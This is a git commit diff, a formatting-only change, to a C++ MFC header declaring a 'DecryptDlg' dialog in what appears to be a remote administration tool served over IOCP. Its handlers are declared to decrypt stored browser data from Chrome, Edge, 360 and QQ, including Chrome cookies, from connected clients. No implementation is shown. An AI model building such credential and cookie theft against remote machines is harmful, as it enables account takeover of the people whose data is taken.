style: Format source code and support grouping client

This commit is contained in:
yuanyuanxiang
2025-10-15 04:32:59 +08:00
parent 77087d2e06
commit 6b81ad1f81
244 changed files with 43052 additions and 42562 deletions

View File

@@ -5,30 +5,30 @@
class DecryptDlg : public CDialogBase
{
DECLARE_DYNAMIC(DecryptDlg)
DECLARE_DYNAMIC(DecryptDlg)
public:
DecryptDlg(CWnd* pParent = NULL, Server* IOCPServer = NULL, CONTEXT_OBJECT* ContextObject = NULL);
virtual ~DecryptDlg();
DecryptDlg(CWnd* pParent = NULL, Server* IOCPServer = NULL, CONTEXT_OBJECT* ContextObject = NULL);
virtual ~DecryptDlg();
VOID OnReceiveComplete();
VOID OnReceiveComplete();
// <20>Ի<EFBFBD><D4BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
enum { IDD = IDD_DIALOG_DECRYPT };
enum { IDD = IDD_DIALOG_DECRYPT };
protected:
virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV ֧<><D6A7>
virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV ֧<><D6A7>
DECLARE_MESSAGE_MAP()
DECLARE_MESSAGE_MAP()
public:
virtual BOOL OnInitDialog();
afx_msg void OnClose();
afx_msg void OnSize(UINT nType, int cx, int cy);
afx_msg void OnDecryptChrome();
afx_msg void OnDecryptEdge();
afx_msg void OnDecryptSpeed360();
afx_msg void OnDecrypt360();
afx_msg void OnDecryptQQ();
afx_msg void OnDecryptChromeCookies();
CEdit m_EditDecrypedResult;
virtual BOOL OnInitDialog();
afx_msg void OnClose();
afx_msg void OnSize(UINT nType, int cx, int cy);
afx_msg void OnDecryptChrome();
afx_msg void OnDecryptEdge();
afx_msg void OnDecryptSpeed360();
afx_msg void OnDecrypt360();
afx_msg void OnDecryptQQ();
afx_msg void OnDecryptChromeCookies();
CEdit m_EditDecrypedResult;
};